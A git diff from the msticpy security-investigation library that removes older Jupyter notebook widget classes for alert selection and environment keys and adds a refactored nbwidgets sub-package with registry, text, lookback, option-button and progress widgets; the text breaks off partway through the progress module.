-    def _time_range_change(self, change):
-        self._query_start = (self.origin_time +
-                             timedelta(0, self._w_tm_range.value[0] * self._time_unit.value))
-        self._query_end = (self.origin_time +
-                           timedelta(0, self._w_tm_range.value[1] * self._time_unit.value))
-        self._w_start_time_txt.value = self._query_start.isoformat(sep=' ')
-        self._w_end_time_txt.value = self._query_end.isoformat(sep=' ')
-
-    @property
-    def start(self):
-        """Query start time."""
-        return self._query_start
-
-    @property
-    def end(self):
-        """Query end time."""
-        return self._query_end
-
-    @property
-    def query_params(self):
-        """
-        Query parameters derived from alert.
-
-        Returns:
-            dict(str, str) -- Dictionary of parameter names
-
-        """
-        return {
-            'start': self.start,
-            'end': self.end
-        }
-
-
-@export
-class AlertSelector(QueryParamProvider):
-    """
-    AlertSelector.
-
-    View list of alerts and select one for investigation.
-    Optionally provide and action to call with the selected alert as a parameter
-    (typically used to display the alert.)
-
-    Attributes:
-        selected_alert: the selected alert
-        alert_id: the ID of the selected alert
-        alerts: the current alert list (DataFrame)
-
-    """
-
-    _ALERTID_REGEX = r'\[id:(?P<alert_id>.*)\]$'
-
-    def __init__(self, alerts: pd.DataFrame, action: Callable[..., None] = None,
-                 columns: list({str})=None, auto_display: bool = False):
-        """
-        Create a new instance of AlertSelector.
-
-            :param alerts: DataFrame of alerts.
-            :param action=None: Optional function to execute for each selected alert.
-        """
-        self.alerts = alerts
-        self.alert_action = action
-
-        if not columns:
-            columns = ['StartTimeUtc', 'AlertName',
-                       'CompromisedEntity', 'SystemAlertId']
-        items = alerts[columns]
-        items = items.sort_values('StartTimeUtc', ascending=True)
-        self._select_items = \
-            items.apply(self._alert_summary, axis=1).values.tolist()
-
-        self.selected_alert = None
-        self.alert_id = None
-
-        self._w_select_alert = widgets.Select(options=self._select_items,
-                                              description='Select alert :',
-                                              layout=Layout(
-                                                  width='95%', height='300px'),
-                                              style={'description_width': 'initial'})
-
-        self._w_filter_alerts = widgets.Text(value='', description='Filter alerts by title:',
-                                             style={'description_width': 'initial'})
-        self._w_output = widgets.Output(layout={'border': '1px solid black'})
-
-        # set up observer callbacks
-        self._w_filter_alerts.observe(self._update_options, names='value')
-        self._w_select_alert.observe(self._select_alert, names='value')
-
-        if auto_display:
-            self.display()
-
-    def display(self):
-        """Display the interactive widgets."""
-        self._select_top_alert()
-        display(widgets.VBox([self._w_filter_alerts,
-                              self._w_select_alert,
-                              self._w_output]))
-
-    def _alert_summary(self, alert_row):
-        """Return summarized string of alert properties."""
-        return '{time}  {alert} ({host}) [id:{id}]'.format(time=alert_row.StartTimeUtc,
-                                                           alert=alert_row.AlertName,
-                                                           host=alert_row.CompromisedEntity,
-                                                           id=alert_row.SystemAlertId)
-
-    def _update_options(self, change):
-        """Filter the alert list by substring."""
-        if change is not None and 'new' in change:
-            self._w_select_alert.options = [
-                i for i in self._select_items if change['new'].lower() in i.lower()]
-
-    def _select_alert(self, selection=None):
-        """Select action triggered by picking item from list."""
-        if (selection is None or 'new' not in selection or
-                not isinstance(selection['new'], str)):
-            self.selected_alert = None
-        else:
-            match = re.search(self._ALERTID_REGEX, selection['new'])
-            if match is not None:
-                self.alert_id = match.groupdict()['alert_id']
-                self.selected_alert = self._get_alert(self.alert_id)
-                if self.alert_action is not None:
-                    self._w_output.clear_output()
-                    with self._w_output:
-                        self.alert_action(self.selected_alert)
-
-    def _get_alert(self, alert_id):
-        """Get the alert by alert_id."""
-        self.alert_id = alert_id
-        selected_alerts = self.alerts[self.alerts['SystemAlertId'] == alert_id]
-
-        if selected_alerts.shape[0] > 0:
-            alert = pd.Series(selected_alerts.iloc[0])
-            if isinstance(alert['ExtendedProperties'], str):
-                try:
-                    alert['ExtendedProperties'] = json.loads(
-                        (alert['ExtendedProperties']))
-                except JSONDecodeError:
-                    pass
-            if isinstance(alert['Entities'], str):
-                try:
-                    alert['Entities'] = json.loads((alert['Entities']))
-                except JSONDecodeError:
-                    pass
-            return alert
-
-    def _select_top_alert(self):
-        """Select the first alert by default."""
-        top_alert = self.alerts.iloc[0]
-        if len(top_alert) == 1:
-            self.alert_id = top_alert.SystemAlertId
-            self.selected_alert = self._get_alert(self.alert_id)
-            if self.alert_action is not None:
-                self._w_output.clear_output()
-                with self._w_output:
-                    self.alert_action(self.selected_alert)
-
-    @property
-    def query_params(self):
-        """
-        Query parameters derived from alert.
-
-        Returns:
-            dict(str, str) -- Dictionary of parameter names
-
-        """
-        return {
-            'provider_alert_id': self.alert_id
-        }
-
-
-@export
-class GetSingleAlert(QueryParamProvider):
-    """
-    GetSingleAlert.
-
-    Try to fetch a single alert by SystemAlertId.
-
-    Attributes:
-        selected_alert: the selected alert
-        alert_id: the ID of the selected alert
-        alerts: the current alert list (DataFrame)
-
-    """
-
-    def __init__(self, action: Callable[..., None] = None, max_lookback: int = 28,
-                 query_time_provider=None, auto_display: bool = False):
-        """
-        Create a new instance of GetSingleAlert.
-
-            :param action=None: Optional function to execute for retrieved alert.
-            :param max_lookback: days
-            :param query_time_provider - an object with 'start' and 'end' properties
-                or a QueryParamProvider with start and end defined in its
-                query_params property
-        """
-        self.alert_action = action
-        self.selected_alert = None
-        self.alert_id = None
-        self.alerts = None
-
-        self._start = None
-        self._end = None
-        if query_time_provider is not None:
-            if ('start' in query_time_provider.__dir__ and
-                    'end' in query_time_provider.__dir__):
-                self._start = query_time_provider.start
-                self._end = query_time_provider.end
-            elif isinstance(query_time_provider, QueryParamProvider):
-                self._start = query_time_provider.query_params.get('start', None)
-                self._end = query_time_provider.query_params.get('end', None)
-
-        if self._end is None:
-            self._end = datetime.now()
-            self._start = self._end - timedelta(max_lookback)
-
-        self._w_target_alert = widgets.Text(
-            value=self.alert_id,
-            placeholder='SystemAlertId',
-            description='SystemAlertId for alert :',
-            layout=Layout(width='50%'),
-            style={'description_width': 'initial'})
-
-        self._w_fetch_button = widgets.Button(description="Get alert..")
-        self._w_fetch_button.on_click(self._click_get_alert)
-
-        self._w_output = widgets.Output(layout={'border': '1px solid black'})
-
-        if auto_display:
-            self.display()
-
-    @property
-    def query_params(self):
-        """
-        Query parameters derived from alert.
-
-        Returns:
-            dict(str, str) -- Dictionary of parameter names
-
-        """
-        return {
-            'system_alert_id': self.alert_id
-        }
-
-    def display(self):
-        """Display the interactive widgets."""
-        display(widgets.VBox([self._w_target_alert,
-                              self._w_fetch_button,
-                              self._w_output]))
-
-    def _click_get_alert(self, button):
-        del button
-        self.alert_id = self._w_target_alert.value
-        if not self.alert_id or not self.alert_id.strip():
-            print('Error: AlertID was not entered')
-
-        self.alerts = qry.exec_query(query_name='get_alert',
-                                     start=self._start,
-                                     end=self._end,
-                                     system_alert_id=self.alert_id)
-        if self.alerts is not None:
-            self.selected_alert = self._get_alert(self.alert_id)
-            if self.alert_action is not None:
-                self._w_output.clear_output()
-                with self._w_output:
-                    self.alert_action(self.selected_alert)
-        else:
-            print('Alert not found.')
-
-    def _get_alert(self, alert_id):
-        self.alert_id = alert_id
-        selected_alerts = self.alerts[self.alerts['SystemAlertId'] == alert_id]
-
-        if selected_alerts.shape[0] > 0:
-            alert = pd.Series(selected_alerts.iloc[0])
-            if isinstance(alert['ExtendedProperties'], str):
-                alert['ExtendedProperties'] = json.loads(
-                    (alert['ExtendedProperties']))
-            if isinstance(alert['Entities'], str):
-                try:
-                    alert['Entities'] = json.loads((alert['Entities']))
-                except JSONDecodeError:
-                    pass
-            return alert
-
-
-@export
-class GetEnvironmentKey(object):
-    """
-    GetEnvironmentKey.
-
-    Tries to retrieve an environment variable value. The value
-    can be changed/set and optionally saved back to the system
-    environment.
-
-    Attributes:
-        name: the name of the environment variable
-        value: the value of the variable
-
-    """
-
-    def __init__(self, env_var: str, help_str: str = None, prompt: str = "Enter the value: ",
-                 auto_display: bool = False):
-        """
-        Create a new instance of GetEnvironmentKey.
-
-            :param env_var: Name of the environment variable.
-            :param help_str=None: Help to display if the environment variable is not set.
-            :param prompt="Enter the value:": Prompt to display with the text box.
-        """
-        self._value = os.environ.get(env_var)
-        self._name = env_var
-
-        if not self._value:
-            display(widgets.HTML(value=help_str))
-
-        self._w_text = widgets.Text(value=self._value,
-                                    description=prompt, layout=Layout(
-                                        width='50%'),
-                                    style={'description_width': 'initial'})
-
-        self._w_save_button = widgets.Button(description='Set',
-                                             layout=Layout(
-                                                 width='10%', disabled=False),
-                                             style={'description_width': 'initial'})
-        self._w_check_save = widgets.Checkbox(value=True,
-                                              description='Save as environment var',
-                                              disabled=False)
-        self._w_save_button.on_click(self._on_save_button_clicked)
-        self._hbox = widgets.HBox(
-            [self._w_text, self._w_save_button, self._w_check_save])
-
-        if auto_display:
-            self.display()
-
-    @property
-    def value(self):
-        """Get the current value of the key."""
-        return self._w_text.value.strip()
-
-    @property
-    def name(self):
-        """Get the current name of the key."""
-        return self._name
-
-    def display(self):
-        """Display the interactive widgets."""
-        display(self._hbox)
-
-    # pylint: disable=locally-disabled, W0613
-    def _on_save_button_clicked(self, button):
-        if self._w_check_save.value:
-            os.environ[self._name] = self._w_text.value.strip()
-
-
-@export
-class SelectString(object):
-    """
-    Selection list from list or dict.
-
-    Attributes:
-        value : The selected value.
-
-    """
-
-    def __init__(self, description: str = None,
-                 item_list: list({str})=None,
-                 action: Callable[..., None] = None,
-                 item_dict: dict({str: str})=None,
-                 auto_display: bool = False,
-                 height: str = '100px',
-                 width: str = '50%'):
-        """
-        Initialize and display list picker.
-
-            :param description=None: List label
-            :param item_list=None: Item List
-            :param item_dict=None: Item dictionary { display_string: value }
-            :param action=None: function to call when item selected
-            :param height='100px': height of list box
-            :param width='50%': width of list box
-        """
-        if item_list:
-            self._item_list = item_list
-            self._item_dict = None
-            self.value = item_list[0]
-        elif item_dict:
-            self._item_list = list(item_dict.keys())
-            self._item_dict = item_dict
-            self.value = list(self._item_dict.values())[0]
-        else:
-            raise ValueError(
-                "One of item_list or item_dict must be supplied.")
-
-        self.item_action = action
-        self._wgt_select = widgets.Select(options=self._item_list,
-                                          description=description,
-                                          layout=Layout(
-                                              width=width, height=height),
-                                          style={'description_width': 'initial'})
-        self._wgt_select.observe(self._select_item, names='value')
-
-        if auto_display:
-            self.display()
-
-    def _select_item(self, selection):
-        if (selection is None or 'new' not in selection or
-                not isinstance(selection['new'], str)):
-            return
-        value = selection['new']
-
-        if self._item_dict:
-            self.value = self._item_dict.get(value, None)
-        else:
-            self.value = value
-
-        if self.item_action is not None:
-            self.item_action(self.value)
-
-    def display(self):
-        """Display the interactive widget."""
-        display(self._wgt_select)
diff --git a/msticpy/nbtools/nbwidgets/__init__.py b/msticpy/nbtools/nbwidgets/__init__.py
new file mode 100644
index 000000000..ede46df75
--- /dev/null
+++ b/msticpy/nbtools/nbwidgets/__init__.py
@@ -0,0 +1,23 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Widgets sub-package."""
+
+from ..._version import VERSION
+
+# pylint: disable=unused-import
+from .core import IPyDisplayMixin, RegisteredWidget  # noqa: F401
+from .get_environment_key import GetEnvironmentKey  # noqa: F401
+from .get_text import GetText  # noqa: F401
+from .lookback import Lookback  # noqa: F401
+from .option_buttons import OptionButtons  # noqa: F401
+from .progress import Progress  # noqa: F401
+from .query_time import QueryTime  # noqa: F401
+from .select_alert import SelectAlert  # noqa: F401
+from .select_item import SelectItem  # noqa: F401
+from .select_subset import SelectSubset  # noqa: F401
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
diff --git a/msticpy/nbtools/nbwidgets/core.py b/msticpy/nbtools/nbwidgets/core.py
new file mode 100644
index 000000000..1d59f73ad
--- /dev/null
+++ b/msticpy/nbtools/nbwidgets/core.py
@@ -0,0 +1,159 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module for pre-defined widget layouts."""
+from abc import ABC
+from enum import IntEnum
+from typing import Any, Dict, List, Optional
+from weakref import WeakValueDictionary
+
+from IPython.display import display
+
+from ..._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+_WIDGET_REG: WeakValueDictionary = WeakValueDictionary()
+
+
+# pylint: disable=too-few-public-methods
+class RegisteredWidget(ABC):
+    """
+    Register widget in the widget registry.
+
+    Registered widgets will store their values in the register.
+    Each widget has an ID that that is derived from one or more of the
+    initialization parameters. If an instance of the same widget class is
+    created with the same parameters, its previous value will be repopulated
+    from the registry.
+    This is especially useful in notebooks where people accidentally re-run
+    the same cell after entering values.
+    """
+
+    def __init__(
+        self,
+        id_vals: Optional[List[Any]] = None,
+        val_attrs: Optional[List[str]] = None,
+        nb_params: Optional[Dict[str, str]] = None,
+        name_space: Dict[str, Any] = globals(),
+        register: bool = True,
+        **kwargs,
+    ):
+        """
+        Initialize a registered widget.
+
+        Parameters
+        ----------
+        id_vals : Optional[List[Any]], optional
+            The list of parameter values to use to identify this widget instance,
+            by default None
+        val_attrs : Optional[List[str]], optional
+            The names of the attributes to persist in the registry
+            and recall, by default ["value"]
+        nb_params : Optional[Dict[str, str]], optional
+            A dictionary of attribute names and global variables. If the variable
+            exists in the global namespace it will be used to populate the
+            corresponding widget attribute. This is only done if the widget
+            attribute currently has no value (i.e. restoring a value from
+            the registry takes priority over this),
+            by default None
+        name_space : Dict[str, Any], optional
+            Namespace to look for global variables, by default None
+        register : bool
+            Do not register the widget or retrieve values from previously-
+            registered instance.
+
+        """
+        del kwargs  # allow to be called with kwargs that are ignored
+        # Try to retrieve previous values based on ID of this control
+        if register and id_vals:
+            id_list = [self.__class__.__name__, *[str(val) for val in id_vals]]
+            self._id = hash("".join(id_list))
+
+            if not val_attrs:
+                val_attrs = ["value"]
+            if self._id in _WIDGET_REG:
+                for attr in val_attrs:
+                    if hasattr(_WIDGET_REG[self._id], attr):
+                        setattr(self, attr, getattr(_WIDGET_REG[self._id], attr))
+            # register the current instance as the last instance
+            _WIDGET_REG[self._id] = self
+
+        # if there are any notebook params relevant to this control
+        if nb_params and name_space:
+            for attr, nb_param in nb_params.items():
+                # if this doesn't have a value set explicitly or
+                # one that was recovered from the widget registry
+                # set it from the nb_param value
+                if nb_param in name_space and not getattr(self, attr, None):
+                    setattr(self, attr, name_space[nb_param])
+
+
+# pylint: enable=too-few-public-methods
+
+
+class IPyDisplayMixin:
+    """IPython display mixin class."""
+
+    def display(self):
+        """Display the interactive widgets."""
+        display(self.layout)
+
+    def _ipython_display_(self):
+        """Display in IPython."""
+        self.display()
+
+
+class TimeUnit(IntEnum):
+    """Time unit enumeration and value."""
+
+    SECOND = 1
+    MINUTE = 60
+    HOUR = 60 * MINUTE
+    DAY = 24 * HOUR
+    WEEK = 7 * DAY
+
+
+def parse_time_unit(unit_str: str) -> TimeUnit:
+    """Return the TimeUnit enum matching the input string."""
+    if unit_str.casefold().startswith("m"):
+        return TimeUnit.MINUTE
+    if unit_str.casefold().startswith("h"):
+        return TimeUnit.HOUR
+    if unit_str.casefold().startswith("s"):
+        return TimeUnit.SECOND
+    if unit_str.casefold().startswith("d"):
+        return TimeUnit.DAY
+    if unit_str.casefold().startswith("w"):
+        return TimeUnit.WEEK
+    return TimeUnit.MINUTE
+
+
+def default_max_buffer(max_default: Optional[int], default: int, unit: TimeUnit) -> int:
+    """Return the max time buffer for a give time unit."""
+    mag_default = abs(int(default * 4))
+    if max_default is not None:
+        max_value = abs(max_default)
+        return max(max_value, mag_default)
+    if unit == TimeUnit.DAY:
+        return max(28, mag_default)
+    if unit == TimeUnit.HOUR:
+        return max(72, mag_default)
+    if unit == TimeUnit.WEEK:
+        return max(20, mag_default)
+    return max(240, mag_default)
+
+
+def default_before_after(default: Optional[int], unit: TimeUnit) -> int:
+    """Return default before and after bounds for a TimeUnit."""
+    if default is not None:
+        return abs(default)
+    if unit in (TimeUnit.DAY, TimeUnit.WEEK):
+        return 1
+    if unit == TimeUnit.HOUR:
+        return 6
+    return 60
diff --git a/msticpy/nbtools/nbwidgets/get_environment_key.py b/msticpy/nbtools/nbwidgets/get_environment_key.py
new file mode 100644
index 000000000..64037397f
--- /dev/null
+++ b/msticpy/nbtools/nbwidgets/get_environment_key.py
@@ -0,0 +1,113 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module for pre-defined widget layouts."""
+import os
+
+import ipywidgets as widgets
+from IPython.display import display
+from ipywidgets import Layout
+
+from ..._version import VERSION
+from .core import IPyDisplayMixin, RegisteredWidget
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+class GetEnvironmentKey(RegisteredWidget, IPyDisplayMixin):
+    """
+    GetEnvironmentKey.
+
+    Tries to retrieve an environment variable value. The value
+    can be changed/set and optionally saved back to the system
+    environment.
+    """
+
+    def __init__(
+        self,
+        env_var: str,
+        help_str: str = None,
+        description: str = "Enter the value: ",
+        auto_display: bool = False,
+        **kwargs,
+    ):
+        """
+        Create a new instance of GetEnvironmentKey.
+
+        Parameters
+        ----------
+        env_var : str
+            Name of the environment variable.
+        help_str : str, optional
+            Help to display if the environment variable is not set. (the default is None)
+        description : str, optional
+            Prompt to display with the text box.
+            (the default is "Enter the value: ")
+            "prompt" is a alias for this parameter
+        auto_display : bool, optional
+            Whether to display on instantiation (the default is False)
+
+        """
+        env_val = os.environ.get(env_var)
+        self._name = env_var
+        self._value = ""
+        description = kwargs.pop("prompt", description)
+
+        # Call superclass to register
+        super().__init__(id_vals=[env_var, description], val_attrs=["_value"], **kwargs)
+
+        # Use the registed widget "remembered" value but if the environment
+        # variable is set override with this value.
+        if env_val is not None:
+            self._value = env_val
+
+        if not self._value and help_str is not None:
+            display(widgets.HTML(value=help_str))
+
+        self._w_text = widgets.Text(
+            value=self._value,
+            description=description,
+            layout=Layout(width="50%"),
+            style={"description_width": "initial"},
+        )
+
+        self._w_save_button = widgets.Button(
+            description="Set",
+            layout=Layout(width="10%", disabled=False),
+            style={"description_width": "initial"},
+        )
+        self._w_check_save = widgets.Checkbox(
+            value=True, description="Save as environment var", disabled=False
+        )
+        self._w_save_button.on_click(self._on_save_button_clicked)
+        self._hbox = widgets.HBox(
+            [self._w_text, self._w_save_button, self._w_check_save]
+        )
+
+        if auto_display:
+            self.display()
+
+    @property
+    def value(self):
+        """Get the current value of the key."""
+        self._value = self._w_text.value or ""
+        return self._value.strip()
+
+    @property
+    def name(self):
+        """Get the current name of the key."""
+        return self._name
+
+    @property
+    def layout(self):
+        """Return underlying widget collection."""
+        return self._hbox
+
+    def _on_save_button_clicked(self, button):
+        del button
+        self._value = self.value
+        if self._w_check_save.value:
+            os.environ[self._name] = self.value
diff --git a/msticpy/nbtools/nbwidgets/get_text.py b/msticpy/nbtools/nbwidgets/get_text.py
new file mode 100644
index 000000000..a7ef97a5b
--- /dev/null
+++ b/msticpy/nbtools/nbwidgets/get_text.py
@@ -0,0 +1,86 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module for pre-defined widget layouts."""
+import ipywidgets as widgets
+from ipywidgets import Layout
+
+from ..._version import VERSION
+from .core import IPyDisplayMixin, RegisteredWidget
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+class GetText(RegisteredWidget, IPyDisplayMixin):
+    """
+    GetEnvironmentKey.
+
+    Tries to retrieve an environment variable value. The value
+    can be changed/set and optionally saved back to the system
+    environment.
+    """
+
+    def __init__(
+        self,
+        default: str = None,
+        description: str = "Enter the value: ",
+        auto_display: bool = False,
+        **kwargs,
+    ):
+        """
+        Create a new instance of GetEnvironmentKey.
+
+        Parameters
+        ----------
+        default : str
+            Default value.
+        description : str, optional
+            Prompt to display with the text box.
+            (the default is "Enter the value: ")
+            "prompt" is a alias for this parameter
+        auto_display : bool, optional
+            Whether to display on instantiation (the default is False)
+
+        See Also
+        --------
+        RegisteredWidget
+
+        """
+        self._value = default
+        description = kwargs.pop("prompt", description)
+
+        # Call superclass to register
+        super().__init__(id_vals=[default, description], val_attrs=["_value"], **kwargs)
+
+        self._w_text = widgets.Text(
+            value=self._value,
+            description=description,
+            layout=Layout(width="50%"),
+            style={"description_width": "initial"},
+        )
+
+        self._w_text.observe(self._update_value, names="value")
+        if auto_display:
+            self.display()
+
+    def _update_value(self, change):
+        self._value = change.get("new", "")
+
+    @property
+    def layout(self):
+        """Return underlying widget collection."""
+        return self._w_text
+
+    @property
+    def value(self):
+        """Get the current value of the key."""
+        return self._value.strip() if self._value else None
+
+    def display(self):
+        """Display the interactive widgets."""
+        if self._value:
+            self._w_text.value = self._value
+        super().display()
diff --git a/msticpy/nbtools/nbwidgets/lookback.py b/msticpy/nbtools/nbwidgets/lookback.py
new file mode 100644
index 000000000..596163f90
--- /dev/null
+++ b/msticpy/nbtools/nbwidgets/lookback.py
@@ -0,0 +1,118 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module for pre-defined widget layouts."""
+from datetime import datetime, timedelta
+from typing import Optional
+
+
+import ipywidgets as widgets
+from ipywidgets import Layout
+
+from ..._version import VERSION
+from .core import (
+    IPyDisplayMixin,
+    parse_time_unit,
+    default_before_after,
+    default_max_buffer,
+)
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+class Lookback(IPyDisplayMixin):
+    """Time lookback slider."""
+
+    # pylint: disable=too-many-arguments
+    def __init__(
+        self,
+        default: Optional[int] = None,
+        description: str = "Select time ({units}) to look back",
+        origin_time: datetime = None,
+        min_value: Optional[int] = None,
+        max_value: Optional[int] = None,
+        units: str = "hour",
+        auto_display: bool = False,
+        **kwargs,
+    ):
+        """
+        Create an instance of the lookback slider widget.
+
+        Parameters
+        ----------
+        default : int, optional
+            The default 'lookback' time (the default is 4)
+        description : str, optional
+            The description to display
+            (the default is 'Select time ({units}) to look back')
+        origin_time : datetime, optional
+            The origin time (the default is `datetime.utcnow()`)
+        min_value : int, optional
+            Minimum value (the default is 1)
+        max_value : int, optional
+            Maximum value (the default is 240)
+        units : str, optional
+            Time unit (the default is 'hour')
+            Permissable values are 'day', 'hour', 'minute', 'second',
+            'week'
+            These can all be abbreviated down to initial characters
+            ('d', 'm', etc.)
+        auto_display : bool, optional
+            Whether to display on instantiation (the default is False)
+
+        """
+        # default to now
+        self.origin_time = datetime.utcnow() if origin_time is None else origin_time
+        description = kwargs.pop("label", description)
+
+        self._time_unit = parse_time_unit(units)
+        if "{units}" in description:
+            description = description.format(units=self._time_unit.name)
+        default = default_before_after(default, self._time_unit)
+        min_value = min_value or 1
+        max_value = default_max_buffer(max_value, default, self._time_unit)
+
+        self._lookback_wgt = widgets.IntSlider(
+            value=default,
+            min=min_value,
+            max=max_value,
+            step=1,
+            description=description,
+            layout=Layout(width="60%", height="50px"),
+            style={"description_width": "initial"},
+        )
+
+        self.end = self.origin_time
+        self._time_unit = parse_time_unit(units)
+        self.start = self.end - timedelta(
+            seconds=(self._time_unit.value * self._lookback_wgt.value)
+        )
+
+        self._lookback_wgt.observe(self._time_range_change, names="value")
+
+        if auto_display:
+            self.display()
+
+    @property
+    def layout(self):
+        """Return underlying widget."""
+        return self._lookback_wgt
+
+    @property
+    def lookback(self):
+        """Return current widget lookback value."""
+        return self._lookback_wgt.value
+
+    @property
+    def value(self):
+        """Return current widget lookback value."""
+        return self._lookback_wgt.value
+
+    def _time_range_change(self, change):
+        del change
+        self.start = self.origin_time - timedelta(
+            0, self._lookback_wgt.value * self._time_unit.value
+        )
diff --git a/msticpy/nbtools/nbwidgets/option_buttons.py b/msticpy/nbtools/nbwidgets/option_buttons.py
new file mode 100644
index 000000000..76416e8b2
--- /dev/null
+++ b/msticpy/nbtools/nbwidgets/option_buttons.py
@@ -0,0 +1,169 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module for pre-defined widget layouts."""
+import asyncio
+from typing import Any, Iterable, Optional
+
+import ipywidgets as widgets
+from IPython.display import display
+
+from ..._version import VERSION
+from .core import IPyDisplayMixin
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+class OptionButtons(IPyDisplayMixin):
+    """
+    OptionButtons creates a sequence of buttons to choose from.
+
+    The widget can be run in synchronous mode as a simple option
+    selector or in async mode with a timeout.
+    In the latter mode, after the timeout has expired the widget
+    value is set to the default option button value.
+    To use the async mode you must call `widget.display_async()` with
+    the async keyword.
+
+    Attributes
+    ----------
+    value : str
+        The value of the option selected (case-normalized)
+
+    Example
+    -------
+    >>> opt = OptionButtons(description="Continue something?",
+    ...  buttons=["Maybe", "Yes", "Cancel"], timeout=10)
+    >>> await opt.display_async()
+
+    """
+
+    def __init__(
+        self,
+        description: Optional[str] = "Select an option to continue",
+        buttons: Optional[Iterable[str]] = None,
+        default: Optional[str] = None,
+        timeout: int = 0,
+        debug: bool = False,
+        **kwargs,
+    ):
+        """
+        Initialize the OptionButton widget.
+
+        Parameters
+        ----------
+        description : Optional[str], optional
+            Description label displayed above the buttons,
+            by default "Select an option to continue"
+        buttons : Optional[Iterable[str]], optional
+            A list of button values, by default None. This
+            will default to ["Yes", "No", "Cancel"]
+            "options" is an alias for this parameter.
+        default : Optional[str], optional
+            The default value to use on timeout, by default the
+            first value in the `buttons` list
+        timeout : int, optional
+            Timeout in seconds, by default 0
+        debug : bool, optional
+            Adds some debug information to an Output controle,
+            by default False
+
+        """
+        buttons = buttons or kwargs.pop("options", None)
+        if buttons is None:
+            buttons = ["Yes", "No", "Cancel"]
+        self._buttons = [widgets.Button(description=b_item) for b_item in buttons]
+        self._desc_label = widgets.Label(value=description)
+        self._timer_label = widgets.Label(layout=widgets.Layout(left="10px"))
+        self.default = default or next(iter(buttons)).casefold()
+        self.value: Optional[str] = None
+        self.timeout = timeout
+
+        self._completion: Any = None
+        self._fut_val: Any = None
+        self._debug = debug
+        if self._debug:
+            self._out = widgets.Output()
+        self._create_button_callbacks(self._buttons)
+
+    @property
+    def layout(self):
+        """Create layout for buttons."""
+        return widgets.VBox(
+            [self._desc_label, widgets.HBox([*(self._buttons), self._timer_label])]
+        )
+
+    def _debug_out(self, mssg: str):
+        if self._debug:
+            self._out.append_stdout(mssg)
+
+    def _create_button_callbacks(self, buttons):
+        """Set up buttons."""
+
+        def getvalue(change):
+            """Button on_click handler."""
+            self.value = change.description
+            for btn in buttons:
+                btn.on_click(getvalue, remove=True)
+
+        for btn in buttons:
+            btn.on_click(getvalue)
+
+    async def _await_widget(self):
+        """Awaitable coroutine for widget."""
+        self._debug_out("await_widget entered\n")
+        self._create_button_callbacks(self._buttons)
+        self._debug_out("buttons set\n")
+
+        done, _ = await asyncio.wait(
+            [self._wait_for_button_change(), self._await_timer(self.timeout)],
+            return_when=asyncio.FIRST_COMPLETED,
+            timeout=self.timeout + 5,
+        )
+        self._debug_out("wait returned\n")
+        self._completion = done
+        self._debug_out(str(done))
+        return done
+
+    async def _wait_for_button_change(self):
+        """Awaitable for button selection state."""
+        self._debug_out("wait_for_button_change entered\n")
+        while self.value is None:
+            await asyncio.sleep(0.1)
+            if self._debug:
+                self._debug_out("*")
+
+    async def _await_timer(self, timeout: int = 5):
+        timeout = max(timeout, 0)
+        while timeout > 0:
+            self._timer_label.value = f"Waiting {timeout} sec..."
+            if self.value:
+                self._timer_label.value = f"Option selected: '{self.value}'"
+                return
+            await asyncio.sleep(1)
+            timeout -= 1
+        self.value = self.default
+        self._timer_label.value = f"Timed out. Defaulted to '{self.value}'"
+
+    async def display_async(self, reset: bool = False):
+        """
+        Display widget with timeout.
+
+        Parameters
+        ----------
+        reset : bool, optional
+            Resets any current value to None,
+            by default False
+
+        """
+        if reset:
+            self.value = None
+        display(self.layout)
+        if self._debug:
+            display(self._out)
+        self._fut_val = asyncio.ensure_future(self._await_widget())
+        self._debug_out("future returned\n")
+        self._debug_out(str(self._fut_val) + "\n")
diff --git a/msticpy/nbtools/nbwidgets/progress.py b/msticpy/nbtools/nbwidgets/progress.py
new file mode 100644
index 000000000..c401be0f1
--- /dev/null
+++ b/msticpy/nbtools/nbwidgets/progress.py
@@ -0,0 +1,105 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module for pre-defined widget layouts."""
+import ipywidgets as widgets
+
+from ..._version import VERSION
+from .core import IPyDisplayMixin
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+class Progress(IPyDisplayMixin):
+    """UI Progress bar."""
+
+    def __init__(self, completed_len: int, visible: bool = True):
+        """
+        Instantiate new _Progress UI.
+
+        Parameters
+        ----------
+        completed_len : int
+            The expected value that indicates 100% done.
+        visible : bool
+            If True start the progress UI visible, by default True.
+
+        """
+        self._completed = 0
+        self._total = completed_len
+        self._progress = widgets.IntProgress(
+            value=0,
+            max=100,
+            description="Progress:",
+            bar_style="info",
+            orientation="horizontal",
+        )
+        self._done_label = widgets.Label(value="0%")
+        if visible:
+            self.show()
+        else:
+            self.hide()
+        self.layout = widgets.HBox([self._progress, self._done_label])
+        self.display()
+
+    @property
+    def value(self) -> int:
+        """
+        Return the current progress value.
+
+        Returns
+        -------
+        int
+            Progess value
+
+        """
+        return self._completed
+
+    @property
+    def max(self) -> int:
+        """
+        Return the current progress maximum value.
+
+        Returns
+        -------
+        int
